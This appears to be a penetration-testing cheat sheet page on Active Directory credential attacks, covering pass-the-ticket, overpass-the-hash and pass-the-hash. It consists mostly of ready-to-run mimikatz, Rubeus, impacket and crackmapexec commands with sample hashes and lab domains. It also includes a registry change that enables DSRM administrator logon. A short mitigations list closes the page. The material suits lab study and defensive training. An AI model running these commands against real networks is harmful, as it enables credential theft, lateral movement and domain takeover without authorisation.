Elite

PTH, PTT, Overpth, ptk

Pass-the-Ticket

Harvesting tickets from Linux

## Extract ticket
privilege::debug => sekurlsa::tickets /export
#or
.\Rubeus dump

Inject ticket into current session

kerberos::ptt [0;304edb]-2-0-40e10000-Administrator@krbtgt-WARGREY.MON.kirbi
klist
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
.\winrs.exe -r:<any other dc> cmd.exe

Rubeus

.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi

.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

Reference: Experimenting with Kerberos Ticket Formats

Overpass The Hash/Pass The Key (PTK)

Linux

impacket-getTGT hacktor.local/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7

export KRB5CCNAME=/root/velociraptor.ccache
impacket-psexec hacktor.local/velociraptor@labwws02.jurassic.park -k -no-pass

Windows

.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt

.\PsExec.exe -accepteula \\labwws02.hacktor.local cmd

Obtain encryption key

privilege::debug => sekurlsa::ekeys

RC4 algorithm

sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:powershell.exe

AES128

sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /aes128:b65ea8151f13a31d01377f5934bf3883 /run:powershell.exe

AES256

sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:powershell.exe
winrs.exe -r:<any other dc> cmd.exe

Using Rubeus

Rubeus.exe asktgt /user:administrator /rc4:ntlmhash /ptt
Rubeus.exe asktgt /user:administrator/aes256:ntlmhash /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Rubeus.exe ptt /ticket:base64

Pass-the-hash

Linux

Pass The Hash using crackmapexec or NXC

Since we have the hashes, we can use the hashes directly without the need for cracking them. Use the following command for crackmapexec

crackmapexec -u "USER NAME" -H HASH --local-auth

#ex
crackmapexec -u "Frank Castle" -H 40739aa18503c6fcf8c7e9d434af2361 --local-auth

Running this will attempt to Pass The Hash to the machines in the network and tell which machine accepted the hash for the specified user.

Here it does not tell Pwned! rather we can see a green plus sign (+) which indicates that there’s a good chance that the attack worked. Pwned determines the confirmed success of the attack.

This can further be used in psexec to gain shell access through the command

impacket-psexec "USER NAME":@TARGET_IP -hashes FULL_NTLM_HASH

impacket-psexec "Frank Castle":@192.168.37.141 -hashes aad3b435b51404eeaad3b435b51404ee:40739aa18503c6fcf8c7e9d434af2361

This tries to find a writable share and upload a shell to execute it and get a shell. Even though the user “frank castle” is authenticated but it does not have admin access over the shares.

Trying the same command on another machine 192.168.1.5 gives an authentication failure

This is because we are going with local authentication. Frank Castle has access to this machine but as a domain user, not a local user. But if we get local authentication successful on a machine of Domain Controller, we can do much more.

Windows

Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "lsadump::sam""exit"'
Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "sekurlsa::msv""exit"'
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD
mimikatz# token::revert
mimikatz# sekurlsa::pth /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /domain:pdc /run:powershell.exe
mimikatz# sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256 krbtgt hash> /run:powershell.exe
SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256 krbtgt hash> /run:cmd.exe" “exit”
Rubeus.exe asktgt /user:SHALBY /rc4:5D88C6E440C1B976A9C1A2EF6AD66083 /ptt
Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
SafetyKatz.exe “sekurlsa::pth /user:user /domain:anything.domain.local /aes256:<> /run:cmd.exe” “exit”
winrs -r:dc whoami
winrs -r:dc cmd

PtH involved directly authenticating to a host by literally sending the password’s hash to the host during the authentication process, while OPtH is way more subtle as it abuses Kerberos authentication.

Mitigations for Pass The Hash/Password

Preventing completely is hard but some controls can be implemented to make it difficult for attackers. Following are some suggestions to prevent the Pass The Hash/Password attacks

  • Limit account reuse

    • Do not reuse the local admin password

    • Disable Guest and Administrator accounts

    • Limit who is the local administrator

  • Utilize strong password

    • Longer passwords

    • Do not use common words

  • Privilege Access Management (PAM) limits Pass The Hash/Password attack as the password/hash is strong and constantly rotated

    • Check out/in sensitive accounts only when needed

    • Automatically rotate passwords at each check out and check-in

overPassTheHash

Video Reference

PreviousKerberos Constrained DelegationNextSilver ticket

Last updated